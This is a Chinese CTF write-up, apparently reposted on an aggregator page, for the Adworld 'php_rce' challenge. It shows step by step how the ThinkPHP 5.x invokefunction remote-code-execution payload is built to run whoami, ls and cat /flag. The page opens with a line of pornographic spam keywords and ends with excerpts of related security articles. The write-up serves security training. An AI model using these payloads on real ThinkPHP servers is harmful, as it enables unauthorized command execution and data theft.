国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

攻防世界-web篇(php_rce)詳解

這篇具有很好參考價值的文章主要介紹了攻防世界-web篇(php_rce)詳解。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

每日一題,今天我們來攻防世界web篇(php_rce)

目錄

1、利用system函數(shù)遠(yuǎn)程命令執(zhí)行

2、查找文件目錄

3、進(jìn)入flag目錄

4、查看flag文件拿到flag


首先打開題目:

php_rce,web安全,滲透測試,攻防世界,安全,web安全

?這里我們可以看到打開后是一個ThinkPHP V5的界面,由此我們可以判斷這是一個使用TinkPHP框架開發(fā)的,接下來我們由長期的滲透經(jīng)驗(yàn)可以想多去網(wǎng)上找相關(guān)的漏洞來復(fù)現(xiàn)

這里時使用了ThinkPHP 5.x 遠(yuǎn)程命令執(zhí)行漏洞

1、利用system函數(shù)遠(yuǎn)程命令執(zhí)行

構(gòu)造payload

index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

php_rce,web安全,滲透測試,攻防世界,安全,web安全

2、查找文件目錄

構(gòu)造payload

index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /

php_rce,web安全,滲透測試,攻防世界,安全,web安全

?可以看到有很多目錄我要找flag接下就這就進(jìn)flag去

3、進(jìn)入flag目錄

構(gòu)造payload

index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /flag

php_rce,web安全,滲透測試,攻防世界,安全,web安全

?有兩個flag文件這里我們直接使用 cat 命令來打開文件

4、查看flag文件拿到flag

構(gòu)造payload

index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat  
 /flag

php_rce,web安全,滲透測試,攻防世界,安全,web安全

flag{thinkphp5_rce}?文章來源地址http://www.zghlxwxcb.cn/news/detail-609467.html

到了這里,關(guān)于攻防世界-web篇(php_rce)詳解的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • WEB攻防-Java安全&JNDI&RMI&LDAP&五大不安全組件&RCE執(zhí)行&不出網(wǎng)

    WEB攻防-Java安全&JNDI&RMI&LDAP&五大不安全組件&RCE執(zhí)行&不出網(wǎng)

    #知識點(diǎn): 1、Java安全-RCE執(zhí)行-5大類函數(shù)調(diào)用 2、Java安全-JNDI注入-RMILDAP高版本 3、Java安全-不安全組件(框架)-ShiroFastJsonJacksonXStreamLog4j 黑盒看參數(shù)名和參數(shù)值 白盒看類函數(shù)名和可控變量(大部分白盒) JNDI全稱為 Java Naming and DirectoryInterface(Java命名和目錄接口),是一組應(yīng)用程序

    2024年02月04日
    瀏覽(28)
  • [CTF/網(wǎng)絡(luò)安全] 攻防世界 PHP2 解題詳析

    [CTF/網(wǎng)絡(luò)安全] 攻防世界 PHP2 解題詳析

    翻譯: 你能給這個網(wǎng)站進(jìn)行身份驗(yàn)證嗎? index.php是一個常見的文件名,通常用于Web服務(wù)器中的網(wǎng)站根目錄下。它是默認(rèn)的主頁文件名,在訪問一個網(wǎng)站時,如果沒有特別指定頁面文件名,則服務(wù)器會自動加載index.php文件。 在Web應(yīng)用程序中,index.php文件通常是網(wǎng)站的入口文件

    2024年02月13日
    瀏覽(27)
  • Web安全攻防世界06 easyupload

    Web安全攻防世界06 easyupload

    這道題我掙扎了很久,還是沒有解出來,詳細(xì) 錯誤 解題思路可以參考另一篇博文~(#_-) CTF 總結(jié)01:文件上傳繞過_梅頭腦_的博客-CSDN博客 ↑博文很啰嗦地講述了我用蟻劍連接一句話木馬花式寫法的各種失敗姿勢,面對文件上傳一步一個坑的絕望心態(tài),歡迎同伴圍觀、吐槽和指

    2024年02月07日
    瀏覽(20)
  • 網(wǎng)絡(luò)安全B模塊(筆記詳解)- Web滲透測試

    網(wǎng)絡(luò)安全B模塊(筆記詳解)- Web滲透測試

    1.通過滲透機(jī)Kali1.0對服務(wù)器場景PYsystem20192進(jìn)行Web滲透測試(使用工具w3af的對目標(biāo)Web服務(wù)器進(jìn)行審計(jì)),在w3af的命令行界面下,使用命令列出所有用于審計(jì)的插件,將該操作使用的命令作為Flag值提交; 進(jìn)入kali命令控制臺中使用命令w3af_console進(jìn)入w3af命令行模式,通過輸入命令

    2024年01月25日
    瀏覽(29)
  • [CTF/網(wǎng)絡(luò)安全] 攻防世界 fileinclude 解題詳析(php偽協(xié)議)

    [CTF/網(wǎng)絡(luò)安全] 攻防世界 fileinclude 解題詳析(php偽協(xié)議)

    由于index.php在/var/www/html目錄下,而flag.php與index.php同為php文件,故猜想flag.php也在該目錄下。 查看頁面源代碼獲取更多信息: 源代碼中看到 @include($lan.\\\".php\\\"); ,即此處存在文件包含。 又因?yàn)?$lan = $_COOKIE[\\\'language\\\']; 因此解題思路為:利用php偽協(xié)議,構(gòu)造language參數(shù),來讀取該目

    2024年02月07日
    瀏覽(24)
  • [CTF/網(wǎng)絡(luò)安全] 攻防世界 simple_php 解題詳析

    [CTF/網(wǎng)絡(luò)安全] 攻防世界 simple_php 解題詳析

    題目描述:小寧聽說php是最好的語言,于是她簡單學(xué)習(xí)之后寫了幾行php代碼。 $a=@$_GET[\\\'a\\\']; 從HTTP GET請求參數(shù)中獲取一個名為a的變量,并將其賦值給變量a。@符號用于禁止錯誤輸出,如果不存在參數(shù)a則會將變量a設(shè)置為NULL。 $b=@$_GET[\\\'b\\\']; 從HTTP GET請求參數(shù)中獲取一個名為b的變量,

    2024年02月13日
    瀏覽(19)
  • Web安全攻防世界05 easyphp(江蘇工匠杯)

    Web安全攻防世界05 easyphp(江蘇工匠杯)

    題目是這個樣子的: 發(fā)現(xiàn)自己編輯的東西有一部分沒有被發(fā)出來,怪不得閱讀量低到可憐...現(xiàn)在重新補(bǔ)上一些內(nèi)容,解題過程很羅嗦,對小白依然友好~ 按照慣例,把源碼貼在這里逐行分析一下~ 解題思路如下: 整個題目就是單純地在考驗(yàn)php語法,并且每個變量輸錯了都有不同

    2024年02月13日
    瀏覽(17)
  • 網(wǎng)絡(luò)安全入門 5 天速成教程_ WEB 安全滲透攻防技術(shù)

    網(wǎng)絡(luò)安全入門 5 天速成教程_ WEB 安全滲透攻防技術(shù)

    前言 隨著 Web 技術(shù)發(fā)展越來越成熟,而非 Web 服務(wù)越來越少的暴露在互聯(lián)網(wǎng)上,現(xiàn)在互聯(lián)網(wǎng)安全主要指的是 Web 安全。 為了自身不“裸奔”在大數(shù)據(jù)里,漸漸開始學(xué)習(xí) Web 安全,在學(xué)習(xí) Web 安全的過程中,發(fā)現(xiàn)很大一部分知識點(diǎn)都相對零散,如果沒有相對清晰 的脈絡(luò)作為參考,

    2024年04月23日
    瀏覽(35)
  • 服務(wù)攻防-數(shù)據(jù)庫安全-服務(wù)應(yīng)用的安全問題以及測試流程-Mysql&Hadoop&未授權(quán)訪問&RCE-漏洞復(fù)現(xiàn)

    服務(wù)攻防-數(shù)據(jù)庫安全-服務(wù)應(yīng)用的安全問題以及測試流程-Mysql&Hadoop&未授權(quán)訪問&RCE-漏洞復(fù)現(xiàn)

    目錄 一、服務(wù)應(yīng)用的安全問題 1、配置不當(dāng)——未授權(quán)訪問 2、安全機(jī)制——特定安全漏洞 3、安全機(jī)制——弱口令爆破攻擊 二、服務(wù)應(yīng)用的安全測試思路 1、判斷服務(wù)是否開放 2、判斷服務(wù)類型 3、判斷利用方式 三、Mysql-未授權(quán)訪問-CVE-2012-2122 利用 1、漏洞概述 2、漏洞復(fù)現(xiàn)

    2024年02月17日
    瀏覽(30)
  • Web安全攻防世界01 fileinclude(宜興網(wǎng)信辦)

    Web安全攻防世界01 fileinclude(宜興網(wǎng)信辦)

    攻防世界文件包含入門題目,參考大佬們的WP有所補(bǔ)充,內(nèi)容對小白友好~ 按照慣例,首先查看源代碼ctrl+u: 整理一下大概是下面這個意思(代碼0基礎(chǔ),可能有誤,歡迎留言溝通與指正~) 所以題目的關(guān)鍵在于達(dá)成這第15行的條件: $lan = $_COOKIE[\\\'language\\\']; 在cookie中的內(nèi)容 lang

    2023年04月08日
    瀏覽(95)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包